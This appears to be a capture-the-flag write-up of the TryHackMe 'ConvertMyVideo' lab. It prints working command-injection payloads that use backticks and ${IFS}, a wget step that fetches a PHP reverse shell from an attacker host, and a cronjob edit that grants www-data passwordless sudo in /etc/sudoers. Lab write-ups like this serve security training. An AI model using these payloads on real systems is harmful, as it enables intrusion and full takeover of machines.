ConvertMyVideo from TryHackMe

ConvertMyVideo is a TryHackMe machine that is rated medium. It has an interesting take on command injection as well as a great demonstration of other methods for including spaces within commands

by Johann Van Niekerk

ConvertMyVideo from TryHackMe

Share


Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ConvertMyVideo is a TryHackMe machine that is rated medium. It has an interesting take on command injection as well as a great demonstration of other methods for including spaces within commands when they would otherwise be dropped and cause issues for your commands. The privilege escalation is great for the patient hacker :).

Initial Access - Command Injection

Our initial enumeration begins with the web application on port 80. When we browse to it, we are met with the following page.

convert

We load up burpsuite and check what happens when we interact with this conversion and the button. It appears to POST when we submit and sends what we've typed to be handled by the webserver. Knowing this, we start testing if we can complete the request and then add more executed commands on after.

commands

In this case, we are using a method for linux where we wrap our command with backticks (not quotation marks) and this will be processed by linux in a hierarchy where our command comes first. The command within the backticks will take precedence. When we execute it we can clearly see nothing appears on the site but when we check on burpsuite, we discover the following

RCE

We test further and while we have command execution with ls, id, whoami etc.. Β the application won't process anything with a space. I've also tried URL encoded with %20 and it still does not work. After searching we discover another method that we can specify a space using linux commands.

We adjust our payload with the following and then see what we have here:

test;`ping${IFS}-c1${IFS}10.4.42.21`
ping works

Now that we know this, we confirm that we can proceed further than just remote code execution and we can attempt at getting a reverse shell as well as our initial access to the machine.

We grab an exploit and in this case I used the Ivan Ε incek version of pentestmonkey PHP reverse shell. Hosted the file and send the following to grab it.

# Upload Malicious File
test;`wget${IFS}http://10.10.26.248/good.php`

# Browse to:
http://10.10.26.248/good.php
shell

Then visiting the page executed my exploit and we got our initial access and compromising the system as www-data.

Privilege Escalation - Root Cronjob

After all general checks, we proceed to run a few enumeration scripts and we still cannot see anything yet. Our next step is to see if we can find any cronjobs that aren't visible to us with a tool such as PsPy.

Root cronjobs that are in Roots crontab are not visible for low privilege users to see so the only way to see activity like that is for running a tool that monitors the system constantly and reports any activity. That is what PsPy does.

# Transfer over
wget 10.4.42.21/pspy64
chmod +x pspy64

# Run PsPy
./pspy64

After a few minutes of monitoring, the following pops up for us and displays an interesting execution

pspy

This appears to run from UID=0 (Root) and it executes a file kept in /www/html/tmp/clean.sh that only completes a single command periodically.

clean.sh

Knowing this, we can do a bunch of different payloads as we can have bash run anything such as reverse shells, root bash executables, add new users and so forth.

We decided to add www-data to the sudoers file instead

echo "echo '$(whoami) ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /var/www/html/tmp/clean.sh
sudoers

Then we run PsPy again and just wait for the execution. Once we can see the activity we can then just run the following a jump straight into root

sudo su
root

With that, we are root and fully compromised the system.